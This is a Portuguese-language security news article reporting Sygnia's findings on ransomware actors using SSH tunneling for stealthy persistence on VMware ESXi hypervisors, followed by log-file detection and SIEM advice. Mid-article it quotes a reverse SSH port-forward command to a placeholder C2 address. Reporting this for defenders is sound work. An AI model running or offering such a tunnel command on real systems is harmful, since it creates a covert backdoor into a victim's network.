Agentes de ransomware que visam hipervisores ESXi bare metal estão utilizando SSH tunneling para persistir no sistema enquanto permanecem não detectados.
Os appliances VMware ESXi desempenham um papel crítico em ambientes virtualizados, pois podem executar várias máquinas virtuais de uma organização em um único servidor físico.
Eles são amplamente não monitorados e têm sido um alvo para hackers que buscam acessar redes corporativas onde podem roubar dados e criptografar arquivos, assim paralisando um negócio inteiro ao tornar todas as máquinas virtuais inacessíveis.
A empresa de cibersegurança Sygnia relata que, em muitos casos, o comprometimento é alcançado explorando falhas conhecidas ou usando credenciais de administrador comprometidas.
ESXi possui um serviço SSH integrado que permite aos administradores gerenciar remotamente o hipervisor via um shell.
A Sygnia diz que agentes de ransomware abusam dessa funcionalidade para estabelecer persistência, mover-se lateralmente e implantar payloads de ransomware.
Como muitas organizações não monitoram ativamente a atividade SSH do ESXi, os atacantes podem usá-lo de maneira furtiva.
"Uma vez que [os hackers] estão no dispositivo, configurar o tunneling é uma tarefa simples usando a funcionalidade SSH nativa ou implantando outras ferramentas comuns com capacidades similares," explica Sygnia.
Por exemplo, usando o binário SSH, um encaminhamento de porta remoto para o servidor C2 pode ser facilmente configurado usando o seguinte comando: ssh –fN -R 127.0.0.1:<porta SOCKS> <usuário>@<endereço IP C2>
Como os appliances ESXi são resilientes e raramente desligam inesperadamente, esse tunneling serve como uma backdoor semi-persistente dentro da rede.
A Sygnia também destaca desafios no monitoramento de logs do ESXi, que levam a lacunas significativas de visibilidade que os agentes de ransomware sabem como aproveitar.
Ao contrário da maioria dos sistemas onde os logs são consolidados em um único arquivo syslog, o ESXi distribui logs em vários arquivos de log dedicados, então encontrar evidências requer juntar informações de múltiplas fontes.
A empresa de segurança sugere que os administradores de sistema olhem para estes quatro arquivos de log para detectar SSH tunneling e atividade de ransomware:
/var/log/shell.log → Registra a execução de comandos no ESXi Shell
/var/log/hostd.log → Registra atividades administrativas e autenticação de usuário
/var/log/auth.log → Captura tentativas de login e eventos de autenticação
/var/log/vobd.log → Armazena logs de eventos de sistema e segurança
Os logs hostd.log e vobd.log provavelmente também conterão vestígios de modificação de regras de firewall, o que é essencial para permitir acesso SSH persistente.
Deve-se notar que agentes de ransomware frequentemente limpam logs para apagar evidências de acesso SSH, modificar timestamps ou truncar logs para confundir os investigadores, então encontrar evidências nem sempre é direto.
Por fim, recomenda-se que as organizações centralizem os logs do ESXi via syslog forwarding e integrem os logs em um sistema de Security Information & Event Management (SIEM) para detectar anomalias.
Publicidade
Conheça a Solyd One, e tenha acesso a todos os cursos de segurança ofensiva da Solyd, todas as certificações práticas, incluindo a SYCP, 2 CTFs anuais com prêmios de até 30 mil reais, dezenas de laboratórios realísticos, suporte, comunidade e muito mais. Saiba mais...